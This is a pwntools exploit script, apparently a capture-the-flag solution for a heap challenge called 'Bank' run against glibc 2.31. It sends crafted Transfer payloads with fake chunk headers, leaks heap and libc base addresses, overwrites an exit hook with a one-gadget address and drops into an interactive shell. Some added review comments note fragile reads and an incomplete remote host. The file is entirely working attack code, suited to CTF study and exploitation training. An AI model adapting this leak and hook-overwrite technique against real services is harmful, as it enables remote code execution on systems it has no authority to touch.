from imp import NullImporter  # unused here; `imp` is deprecated and no longer ships with Python 3.12+
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./Bank')
DEBUG = 1
if DEBUG:
    # Local run: the target is launched under an explicit ld/libc pair from a
    # user-specific absolute path. The libc-relative constants further down
    # presumably were taken against this exact 2.31 build — confirm before
    # pointing the script at any other environment.
    libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/libc-2.31.so")
    ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/ld-2.31.so")
    p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path})
else:
    ip = '127'  # NOTE(review): incomplete host string; the remote branch is not usable as written
    port = 30007
    p = remote(ip, port)
def debug(info='b main'):
    # Attach gdb to the live tube; `info` is passed through as the gdb script (default: break at main).
    gdb.attach(p, info)
def login():
    """Walk the service's login dialog with the fixed test credentials.

    Answers the menu prompt with ``Login``, the card prompt with ``1`` and the
    password prompt with six ``1`` characters, each terminated by a newline.
    """
    exchange = (
        (b"Click: ", b'Login'),
        (b"Card Numbers: ", b'1'),
        (b"Password: ", b'1'*6),
    )
    for prompt, answer in exchange:
        p.sendlineafter(prompt, answer)
def depo(num):
    """Select ``Deposit`` and answer the amount prompt with ``num`` as ASCII digits.

    The amount is written with ``sendafter`` — no trailing newline — so the
    service must read it without waiting for end-of-line.
    """
    p.sendlineafter(b"Click: ", b"Deposit")
    amount = str(num).encode('ascii')
    p.sendafter(b"How Much?", amount)
def put(num):
    """Select ``Put`` and answer the amount prompt with ``num`` as ASCII digits.

    Mirrors ``depo`` except for the menu choice; the amount is sent without a
    trailing newline.
    """
    p.sendlineafter(b"Click: ", b"Put")
    amount = str(num).encode('ascii')
    p.sendafter(b"How Much?", amount)
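def tran(num, content, user=''):
    """Drive the ``Transfer`` dialog for one of the recipients the service knows.

    Args:
        num: amount; sent as ASCII digits with no trailing newline.
        content: follow-up payload. For ``'guest'`` it is sent verbatim (callers
            in this file pass ``bytes``); for ``'hacker'``, ``'ghost'`` and
            ``'abyss'`` it is ``str()``-ed and ASCII-encoded; for ``'admin'``
            it is ignored.
        user: recipient name, one of ``'admin'``, ``'hacker'``, ``'guest'``,
            ``'ghost'``, ``'abyss'``.

    Raises:
        ValueError: for any other ``user``. The original fell through silently
            after naming the recipient, leaving the dialog parked on its amount
            prompt and every later ``sendlineafter`` waiting on the wrong text;
            rejecting up front keeps the tube in a known state.
    """
    known = ('admin', 'hacker', 'guest', 'ghost', 'abyss')
    if user not in known:
        raise ValueError(f"tran: unknown recipient {user!r}; expected one of {known}")
    amount = str(num).encode('ascii')
    p.sendlineafter(b"Click: ", b"Transfer")
    p.sendlineafter(b"who? ", user.encode('ascii'))
    # Every recognised recipient is asked for the amount first; only the
    # follow-up exchange differs.
    p.sendafter(b"How much? ", amount)
    if user == 'admin':
        return
    if user == 'hacker':
        p.recvuntil(b"hacker: Great!")
        p.send(str(content).encode('ascii'))
    elif user == 'guest':
        p.recvuntil(b"data: ")
        p.send(content)
    elif user == 'ghost':
        p.recvuntil(b"ghost: &^%$#@! :)\n")
        p.send(str(content).encode('ascii'))
    else:
        # 'abyss': the payload is written without waiting for a prompt.
        p.send(str(content).encode('ascii'))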
# --- interaction sequence against the `p` tube opened above ---
# Every constant below (amounts, payload sizes, the two subtracted offsets and
# the two libc-relative addresses) is tied to this particular Bank binary and
# the libc-2.31 build it is launched with; only `heap` and `leak` are derived
# at runtime. The meaning of the interleaved ghost/guest transfers depends on
# the binary's handlers, which are not in this file.
login()
put(0x190)
tran(0xb, 0x38, 'ghost')
tran(6, p64(0)+p64(0x421), 'guest')
tran(0xb, 0x48, 'ghost')
tran(6, b'a'*0x10, 'guest')
tran(0xb, 0x58, 'ghost')
tran(6, b'a'*0x10, 'guest')
tran(0xb, 0x68, 'ghost')
tran(0x1f, 'a', 'admin')  # content is ignored for 'admin'; the reply is read on the next line
p.recvuntil(b"I think 0x")
# NOTE(review): recv(12) returns *up to* 12 bytes; a short read here would
# silently produce a wrong base. The -0x10 adjustment is presumably a rebase to
# the start of the region — confirm against the binary.
heap = int(p.recv(12), 16) - 0x10
log.info("heap_base==>0x%x" %heap)
tran(0xb, 0x78, 'ghost')
tran(6, b'a'*0x10, 'guest')
tran(0xb, 0x88, 'ghost')
tran(6, b'a'*0x10, 'guest')
tran(0xb, 0x98, 'ghost')
tran(6, b'a'*0x10, 'guest')
tran(0xb, 0x100, 'ghost')
tran(6, b'a'*0x10, 'guest')
tran(0x33, heap+0x310, 'hacker')
tran(6, b'a'*0x10, 'guest')
tran(6, b'a'*0x10, 'guest')
tran(6, b'a'*0x10, 'guest')
tran(6, b'a'*0x10, 'guest')
tran(0x1f, 'a', 'admin')
p.recvuntil(b"I think 0x")
# NOTE(review): same short-read caveat as above; 0x1ebbe0 is specific to the
# libc build loaded in the DEBUG branch.
leak = int(p.recv(12), 16) - 0x1ebbe0
log.info("libc_base==>0x%x" %leak)
exit_hook = leak + 0x426f68  # libc-relative; valid only for the libc build loaded above
ogg = leak + 0xe6c7e         # libc-relative; valid only for the libc build loaded above
tran(0x33, heap+0x2a0, 'hacker')
tran(6, p64(exit_hook), 'guest')
tran(1, ogg, 'abyss')
p.interactive()